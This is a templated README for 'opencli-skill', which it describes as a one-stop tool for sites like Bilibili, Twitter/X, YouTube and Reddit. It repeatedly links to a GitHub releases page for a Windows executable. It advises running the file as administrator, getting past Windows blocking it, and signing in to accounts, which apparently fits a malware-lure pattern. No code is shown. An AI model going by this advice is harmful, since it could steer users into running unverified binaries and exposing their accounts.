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opencli-skill
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WHAT THIS AGENT DOES
opencli-skill provides a simple way to access and use popular social media and content websites like YouTube, Twitter, and Reddit all from one place. It solves the problem of constantly switching between different websites and apps to manage your online presence. This tool is ideal for individuals who regularly use these platforms and want a more streamlined experience. It’s useful because it consolidates access, making it easier to check feeds, open links, and switch between sites. The agent distinguishes itself by offering this centralized access without requiring any technical expertise or command-line knowledge.
README
# opencli-skill - Simple access for social sites [](https://github.com/Baublediagonal89/opencli-skill/releases) ## 🧰 What this app does opencli-skill lets you use the opencli command line to work with popular social and content sites from one place. It is made for people who want a simple way to open, view, and use sites like: - Bilibili - Zhihu - Twitter/X - YouTube - Weibo - 小红书 - V2EX - Reddit - Hacker News - 雪球 - BOSS直聘 It keeps the flow simple. You use one tool instead of moving between many sites and apps. ## 💻 What you need To run opencli-skill on Windows, you need: - A Windows PC - A stable internet connection - Enough free disk space for the app and site data - A modern browser for any sign-in steps - Permission to run downloaded apps on your PC Best results come from Windows 10 or Windows 11. ## 📥 Download Visit this page to download the latest version for Windows: https://github.com/Baublediagonal89/opencli-skill/releases On that page, look for the newest release and pick the file that matches your system. For most Windows users, that will be an `.exe` file or a zipped Windows build. ## 🪟 Install on Windows 1. Open the download page. 2. Find the latest release at the top of the list. 3. Download the Windows file. 4. If the file is zipped, right-click it and choose Extract All. 5. Open the folder with the app files. 6. Double-click the app file to start it. 7. If Windows asks for permission, choose Run or Yes. If your browser saves the file to Downloads, open that folder and start it from there. ## ▶️ Run the app After you start the app, follow the on-screen steps. You may see prompts for: - Site selection - Sign-in - Local browser use - Account access - Basic setup Use the options shown in the app. The flow is meant to be simple, so you can move step by step without knowing command line tools. ## 🧭 First-time setup When you open opencli-skill for the first time, do this: 1. Pick the site you want to use. 2. Sign in if the app asks for it. 3. Let the app open your browser if needed. 4. Confirm any access steps that appear. 5. Save your settings if the app offers that choice. If you plan to use the app often, keep the same browser and user account so your session stays stable. ## 📚 How to use it Use opencli-skill when you want a single entry point for supported platforms. Common uses include: - Checking posts and feeds - Opening content links - Switching between sites with less effort - Managing tasks on job and social sites - Working with content sources from one tool The exact screens and options depend on the site you choose. Each site has its own rules, and the app follows those rules. ## 🛠️ Basic tips - Keep the app updated - Use the latest release for the best results - Stay signed in where needed - Close other copies of the app if one is already running - If a page does not load, refresh and try again - If a browser step appears, complete it before moving on If you use a work or school PC, ask for access rights before changing browser or file settings. ## 🔒 Privacy and account use opencli-skill works with online services that need your account login. Use your own account only. Keep these points in mind: - Do not share your login details - Use a trusted PC - Log out when you are done on shared devices - Review the site’s own rules before use ## 🧩 Supported sites The app is designed to work with a wide set of content and community sites, including: - Bilibili - Zhihu - Twitter/X - YouTube - Weibo - 小红书 - V2EX - Reddit - Hacker News - 雪球 - BOSS直聘 Support can change as sites update their pages and rules. For the best result, keep the app on the latest release. ## 🖥️ File types you may see The release page may offer one of these: - `.exe` file: double-click to run - `.zip` file: extract first, then run - `.msi` file: follow the install prompt - source files: for users who want to inspect the code, not needed for normal use If you want the fastest path, choose the Windows build made for regular users. ## ❓ Common issues ### The app does not open - Try right-clicking the file and choose Run as administrator - Check if Windows blocked the file - Download the file again if it looks incomplete ### The browser does not launch - Make sure you have a browser installed - Close extra browser windows - Try again after restarting the app ### A site does not work - Check that you are signed in - Make sure the site is still reachable - Try the latest release from the download page ### The file will not extract - Use the built-in Windows extractor - Make sure the download finished - Move the file to a simple folder such as `Downloads` or `Desktop` ## 🔄 Update steps When a new version is out: 1. Return to the release page. 2. Download the latest Windows file. 3. Replace the old app files if needed. 4. Start the new version. Using the newest release helps keep site support current. ## 📁 Suggested folder setup If you want to keep things tidy, use a folder like this: - `Downloads\opencli-skill` - `Desktop\opencli-skill` - `Documents\Apps\opencli-skill` Keep the app in one place so you can find it fast later. ## 🧪 Quick start 1. Open the release page. 2. Download the latest Windows build. 3. Extract it if needed. 4. Run the app. 5. Choose a site. 6. Sign in. 7. Start using the site through opencli-skill ## 🧠 Best use case opencli-skill fits users who want one tool for many social and content sites. It helps when you want less switching between sites and a more direct way to access online content from Windows ## 📌 Download again If you need the latest build, use this page: https://github.com/Baublediagonal89/opencli-skill/releases
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